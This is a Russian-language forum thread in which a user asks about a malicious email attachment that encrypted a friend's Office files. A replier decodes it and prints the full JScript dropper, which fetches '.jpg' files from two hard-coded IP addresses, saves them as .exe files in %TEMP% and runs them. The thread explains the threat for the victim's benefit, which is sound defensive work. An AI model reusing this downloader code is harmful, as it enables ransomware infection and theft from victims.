Подскажите, что делает (как работает) данный скрипт.
Вложений: 1
Добрый день! В JS ничего не понимаю, на почту пришло письмо с вложением и знакомая его запустила. И файлы Word и Excel зашифровались... Можно ли как-то их расшифровать... Файл пришедший по почте вложил.
|
Текст закодированный в base64 преобразует в исходный код, например, var s = Base64.decode(b) - в итоге s будет равно вот такому червяку:
var email = "mail@allweld.ru";
function dl(fr,url,ext) {
var ws = new ActiveXObject("WScript.Shell");
var fn = ws.ExpandEnvironmentStrings("%TEMP%")+String.fromCharCode(92)+Math.round(Math.random()*100000000)+ext;
var dn = 0;
var xo = new ActiveXObject("MSXML2.XMLHTTP");
xo.onreadystatechange = function() {
if (xo.readyState == 4 && xo.status == 200) {
var xa = new ActiveXObject("ADODB.Stream");
xa.open();
xa.type = 1;
xa.write(xo.ResponseBody);
if (xa.size > 0) {
dn = 1; xa.position = 0;
xa.saveToFile(fn,2);
try {
ws.Run(fn,1,1);
}catch (er) {};
};
xa.close();
};
};
try {
xo.open("GET",url, false); xo.send();
}
catch (er) {};
};
dl('mail@allweld.ru','http://185.49.68.140/August.jpg','.exe');
dl('mail@allweld.ru','http://185.49.68.141/All.jpg','.exe');
и далее. Открывает HTA приложение, из под которого вся эта "кака" и работает. |
А расшифровать файлы зашифрованные этим скриптом можно???
|
Расшифровка не главное, код выше заливает на ваш комп червей с двух адресов под видом невинных картинок. 99% из 100, что ваш комп заражен, ну или подруги, в общем тот на котором это запускалось.
Кашмарский в помощь, искать на его страницах по описанию пакости, узнаете чем заражен и как лечить. Если конечно этот червяк им уже знаком. |
Ясно. Спасибо!
|
Если интересно, то любопытную информацию можно получить о этих IP на whois сервисе, трассировка и пинг адресов.
|
| Часовой пояс GMT +3, время: 01:48. |